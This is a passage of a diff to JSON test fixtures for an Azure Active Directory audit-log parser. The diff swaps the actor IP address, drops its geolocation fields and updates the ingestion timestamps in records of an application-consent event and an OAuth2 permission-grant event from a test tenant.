Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3393756Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118027\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"0031778a-80cf-49f8-aea2-f798c9bf1ec9\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -10714,25 +9796,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -10746,7 +9810,7 @@ "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -10885,7 +9949,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -10897,12 +9961,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036395200Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3393756Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118027\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"0031778a-80cf-49f8-aea2-f798c9bf1ec9\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125140500Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3393756Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118027\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"0031778a-80cf-49f8-aea2-f798c9bf1ec9\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -10928,25 +9992,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -10960,7 +10006,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -11096,7 +10142,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -11108,12 +10154,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036399500Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125147200Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 